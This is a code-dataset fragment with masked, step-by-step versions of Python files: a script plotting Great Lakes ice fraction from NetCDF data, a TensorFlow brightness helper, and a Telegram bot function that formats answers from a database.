'/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_plot_area_avg(target_nc_folder='', source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n s_source = pd.Series(data=[(field[~field.mask].mean() if not np.all(\n field.mask) else np.nan) for field in source_data], index=source_time)\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n s_lkeff = pd.Series([(field[~field.mask].mean() if not np.all(field.\n mask) else np.nan) for field in lkeff_data], index=lkeff_time)\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.\n index >= lkeff_time[0])]\n assert isinstance(s_source, pd.Series)\n print(f'Source: len={len(s_source)}')\n print(f'Lkeff: len={len(s_lkeff)}')\n fig = plt.figure()\n gs = GridSpec(2, 1)\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker='.', linestyle='None', label='original')\n ax.legend()\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker='.', linestyle='None', label='lkeff')\n ax.legend()\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n __print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n '/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_plot_area_avg(target_nc_folder='', source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n s_source = pd.Series(data=[(field[~field.mask].mean() if not np.all(\n field.mask) else np.nan) for field in source_data], index=source_time)\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n s_lkeff = pd.Series([(field[~field.mask].mean() if not np.all(field.\n mask) else np.nan) for field in lkeff_data], index=lkeff_time)\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.\n index >= lkeff_time[0])]\n assert isinstance(s_source, pd.Series)\n print(f'Source: len={len(s_source)}')\n print(f'Lkeff: len={len(s_lkeff)}')\n fig = plt.figure()\n gs = GridSpec(2, 1)\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker='.', linestyle='None', label='original')\n ax.legend()\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker='.', linestyle='None', label='lkeff')\n ax.legend()\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n __print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n '/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from datetime import datetime\nimport xarray\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib.dates import date2num\nimport numpy as np\nfrom matplotlib.gridspec import GridSpec\n\n\ndef test_plot_area_avg(target_nc_folder='', source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n s_source = pd.Series(data=[(field[~field.mask].mean() if not np.all(\n field.mask) else np.nan) for field in source_data], index=source_time)\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n s_lkeff = pd.Series([(field[~field.mask].mean() if not np.all(field.\n mask) else np.nan) for field in lkeff_data], index=lkeff_time)\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.\n index >= lkeff_time[0])]\n assert isinstance(s_source, pd.Series)\n print(f'Source: len={len(s_source)}')\n print(f'Lkeff: len={len(s_lkeff)}')\n fig = plt.figure()\n gs = GridSpec(2, 1)\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker='.', linestyle='None', label='original')\n ax.legend()\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker='.', linestyle='None', label='lkeff')\n ax.legend()\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n __print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n '/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc'\n )\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=\n source_nc_path)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from datetime import datetime\n\nimport xarray\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib.dates import date2num\nimport numpy as np\nfrom matplotlib.gridspec import GridSpec\n\n\ndef test_plot_area_avg(target_nc_folder=\"\", source_nc_path=\"\"):\n\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_1980-2009\"\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_icefix_Obs_1980-1981_test\"\n\n #target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1980-1981_test1\"\n\n\n\n ice_fr = xarray.open_dataset(source_nc_path)[\"LC\"]\n\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n\n\n # t, x, y\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords[\"time\"]\n source_time = pd.to_datetime(source_time.values.tolist())\n\n s_source = pd.Series(data=[\n (field[~field.mask].mean() if not np.all(field.mask) else np.nan) for field in source_data\n ], index=source_time)\n\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + \"/*daily.nc\")[\"lake_ice_fraction\"]\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords[\"t\"].values.tolist())\n\n s_lkeff = pd.Series([\n (field[~field.mask].mean() if not np.all(field.mask) else np.nan) for field in lkeff_data\n ], index=lkeff_time)\n\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.index >= lkeff_time[0])]\n\n assert isinstance(s_source, pd.Series)\n\n #\n print(f\"Source: len={len(s_source)}\")\n print(f\"Lkeff: len={len(s_lkeff)}\")\n\n # do the plotting\n fig = plt.figure()\n gs = GridSpec(2, 1)\n # plot initial lake fractions\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker=\".\", linestyle=\"None\", label=\"original\")\n ax.legend()\n\n\n # plot lake fractions outputed by hles algorithm\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker=\".\", linestyle=\"None\", label=\"lkeff\")\n\n ax.legend()\n # plt.show()\n\n\ndef __print_field_stats(tfield, field, label):\n\n\n good_mask = ~field.mask\n\n if not np.any(good_mask):\n print(f\"{label}: no meaningful data\")\n return\n\n good_data = field[good_mask]\n print(f\"{label} {tfield}:\\n{good_data.min()}...{good_data.max()}\\n\"\n f\"mean={good_data.mean()}\\n\"\n f\"std={good_data.std()}\\n\")\n print(\"-\" * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=\"\"):\n\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_1980-2009\"\n\n\n\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1980-1981_test1\"\n\n ice_fr = xarray.open_dataset(source_nc_path)[\"LC\"]\n\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n\n\n start_date = datetime(1981, 1, 1)\n\n\n # t, x, y\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords[\"time\"]\n source_time = pd.to_datetime(source_time.values.tolist())\n\n\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + \"/*daily.nc\")[\"lake_ice_fraction\"]\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords[\"t\"].values.tolist())\n\n\n # select from lkeff data\n lkeff_time_sel = []\n lkeff_data_sel = []\n\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n\n\n\n # Select from the source time and data\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n\n\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n\n fig = plt.figure(figsize=(20, 10))\n\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f\"Source if: {ts}\")\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f\"Lkeff if: {tl}\")\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n\n print(\"*\" * 20)\n __print_field_stats(ts, data_s, \"source\")\n __print_field_stats(tl, data_l, \"lkeff\")\n print(\"*\" * 20)\n\n\n\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f\"ms={ms}; ml={ml}\")\n plt.show()\n\n plt.close(fig)\n\n\n\n\n\n\ndef main():\n target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981\"\n # source_nc_path = \"/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260/cis_nic_glerl_interpolated_lc.nc\"\n source_nc_path = \"/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc\"\n\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)\n # test_plot_maps(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)\n plt.show()\n\n\n\nif __name__ == '__main__':\n main()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
#!/usr/bin/env python3
""" brightness an image"""
import tensorflow as tf
def change_brightness(image, max_delta):
"""brightness an image"""
img = tf.image.adjust_brightness(image, max_delta)
return img
|
normal
|
{
"blob_id": "07e068dbc1ba1bcb85121ee49f2f9337cae188ba",
"index": 9388,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef change_brightness(image, max_delta):\n \"\"\"brightness an image\"\"\"\n img = tf.image.adjust_brightness(image, max_delta)\n return img\n",
"step-3": "<mask token>\nimport tensorflow as tf\n\n\ndef change_brightness(image, max_delta):\n \"\"\"brightness an image\"\"\"\n img = tf.image.adjust_brightness(image, max_delta)\n return img\n",
"step-4": "#!/usr/bin/env python3\n\"\"\" brightness an image\"\"\"\nimport tensorflow as tf\n\n\ndef change_brightness(image, max_delta):\n \"\"\"brightness an image\"\"\"\n img = tf.image.adjust_brightness(image, max_delta)\n return img\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def send_answer(question_id, answer_owner, receiver_tel_id, short):
answer = cur.execute(
'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'
, (question_id, answer_owner)).fetchone()
keyboard = telebot.types.InlineKeyboardMarkup()
if answer is not None:
(id, question_id, tel_id, answer, accepted_answer, rate_answer,
photo, document, document_type, document_size, send_date) = (cur
.execute(
'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',
(question_id, answer_owner)).fetchone())
question_owner = cur.execute(
'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (
answer_owner,)).fetchone()[0]
short_message_flag = False
if limit_text(answer):
short_message_flag = True
if short:
answer = limit_text(answer)
showkey = showmore
else:
showkey = showless
if receiver_tel_id == question_owner:
if accepted_answer:
keyboard.add(showkey)
else:
keyboard.add(showkey, accept_answer, next_page_answer)
else:
keyboard.add(showkey)
elif receiver_tel_id == question_owner:
if not accepted_answer:
if question_owner == receiver_tel_id:
keyboard.add(accept_answer, next_page_answer)
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
if role in ['STUDENT', 'TA']:
if accepted_answer:
answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(
question_id) + ' #' + str(answer_owner
) + '\n\n' + answer + emoji.emojize(
"""
:high_voltage: Rated: {0}/5""".format(rate_answer))
else:
answer = emoji.emojize(':bright_button: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer
if role == 'TA':
answer += emoji.emojize('\n\n:bust_in_silhouette: Sent by '
) + role
elif role in ['ADMIN']:
question_state = cur.execute(
'SELECT status FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
keyboard = telebot.types.InlineKeyboardMarkup()
if short_message_flag:
if short:
showkey = showmore
else:
showkey = showless
keyboard.add(showkey)
else:
keyboard = None
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
answer = emoji.emojize(':collision: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer + emoji.emojize(
"""
:bust_in_silhouette: Sent by """) + role
return answer, keyboard
<|reserved_special_token_1|>
from keyboards import *
from DB import cur, conn
from bot_token import bot
from limit_text import limit_text
def send_answer(question_id, answer_owner, receiver_tel_id, short):
answer = cur.execute(
'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'
, (question_id, answer_owner)).fetchone()
keyboard = telebot.types.InlineKeyboardMarkup()
if answer is not None:
(id, question_id, tel_id, answer, accepted_answer, rate_answer,
photo, document, document_type, document_size, send_date) = (cur
.execute(
'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',
(question_id, answer_owner)).fetchone())
question_owner = cur.execute(
'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (
answer_owner,)).fetchone()[0]
short_message_flag = False
if limit_text(answer):
short_message_flag = True
if short:
answer = limit_text(answer)
showkey = showmore
else:
showkey = showless
if receiver_tel_id == question_owner:
if accepted_answer:
keyboard.add(showkey)
else:
keyboard.add(showkey, accept_answer, next_page_answer)
else:
keyboard.add(showkey)
elif receiver_tel_id == question_owner:
if not accepted_answer:
if question_owner == receiver_tel_id:
keyboard.add(accept_answer, next_page_answer)
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
if role in ['STUDENT', 'TA']:
if accepted_answer:
answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(
question_id) + ' #' + str(answer_owner
) + '\n\n' + answer + emoji.emojize(
"""
:high_voltage: Rated: {0}/5""".format(rate_answer))
else:
answer = emoji.emojize(':bright_button: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer
if role == 'TA':
answer += emoji.emojize('\n\n:bust_in_silhouette: Sent by '
) + role
elif role in ['ADMIN']:
question_state = cur.execute(
'SELECT status FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
keyboard = telebot.types.InlineKeyboardMarkup()
if short_message_flag:
if short:
showkey = showmore
else:
showkey = showless
keyboard.add(showkey)
else:
keyboard = None
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
answer = emoji.emojize(':collision: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer + emoji.emojize(
"""
:bust_in_silhouette: Sent by """) + role
return answer, keyboard
<|reserved_special_token_1|>
from keyboards import *
from DB import cur, conn
from bot_token import bot
from limit_text import limit_text
def send_answer(question_id, answer_owner, receiver_tel_id, short):
answer = cur.execute('''SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''', (question_id, answer_owner)).fetchone()
keyboard = telebot.types.InlineKeyboardMarkup()
if answer is not None:
id, question_id, tel_id, answer, accepted_answer, rate_answer, photo, document, document_type, document_size, send_date = cur.execute(
'''SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''',
(question_id, answer_owner)).fetchone()
question_owner = \
cur.execute('''SELECT tel_id FROM Questions WHERE id = (%s)''', (question_id, )).fetchone()[0]
# Limiting Long Questions and specifying keyboard accordingly
# GETTING ADMINS AND TAs
role = cur.execute('''SELECT role FROM Users WHERE tel_id = (%s)''', (answer_owner, )).fetchone()[0]
# This flag is used at the bottom for Admin and TAs keyboard setting
short_message_flag = False
# Setting keyboard
if limit_text(answer):
short_message_flag = True
# SHOWMORE key
if short:
answer = limit_text(answer)
showkey = showmore
else:
showkey = showless
if receiver_tel_id == question_owner:
if accepted_answer:
keyboard.add(showkey)
else:
keyboard.add(showkey, accept_answer, next_page_answer)
else:
# FOLLOWERs and Answer Owner only get a show more key
keyboard.add(showkey)
else:
if receiver_tel_id == question_owner:
if not accepted_answer:
if question_owner == receiver_tel_id:
keyboard.add(accept_answer, next_page_answer)
# ATTACHMENTs
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'
.format(document_type, document_size)), callback_data='document')
keyboard.add(document_button)
# SETTING EMOJI BASED ON ACCEPTED OR NOT ACCEPTED ANSWER
if role in ['STUDENT', 'TA']:
if accepted_answer:
answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(question_id) + ' #' + \
str(answer_owner) + '\n\n' + answer + emoji.emojize('\n\n:high_voltage: Rated: {0}/5'.format(rate_answer))
else:
answer = emoji.emojize(':bright_button: #A_') + str(question_id) + ' #' + str(answer_owner) + '\n\n' + answer
if role == 'TA':
answer += emoji.emojize('\n\n:bust_in_silhouette: Sent by ') + role
## ADMINs AND TAs answers are indicated with a flag
elif role in ['ADMIN']:
question_state = cur.execute('''SELECT status FROM Questions WHERE id = (%s)''', (question_id,)).fetchone()[0]
# ADMIN Answers are different
keyboard = telebot.types.InlineKeyboardMarkup()
if short_message_flag:
# SHOWMORE key
if short:
showkey = showmore
else:
showkey = showless
keyboard.add(showkey)
else:
keyboard = None
# ATTACHMENTs
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
answer = emoji.emojize(':collision: #A_') + str(question_id) + ' #' + str(answer_owner) + '\n\n' \
+ answer + emoji.emojize('\n\n:bust_in_silhouette: Sent by ') + role
# Returning Answer and Two Keyboards
return (answer, keyboard)
|
flexible
|
{
"blob_id": "464fc2c193769eee86a639f73b933d5413be2b87",
"index": 3396,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef send_answer(question_id, answer_owner, receiver_tel_id, short):\n answer = cur.execute(\n 'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'\n , (question_id, answer_owner)).fetchone()\n keyboard = telebot.types.InlineKeyboardMarkup()\n if answer is not None:\n (id, question_id, tel_id, answer, accepted_answer, rate_answer,\n photo, document, document_type, document_size, send_date) = (cur\n .execute(\n 'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',\n (question_id, answer_owner)).fetchone())\n question_owner = cur.execute(\n 'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (\n answer_owner,)).fetchone()[0]\n short_message_flag = False\n if limit_text(answer):\n short_message_flag = True\n if short:\n answer = limit_text(answer)\n 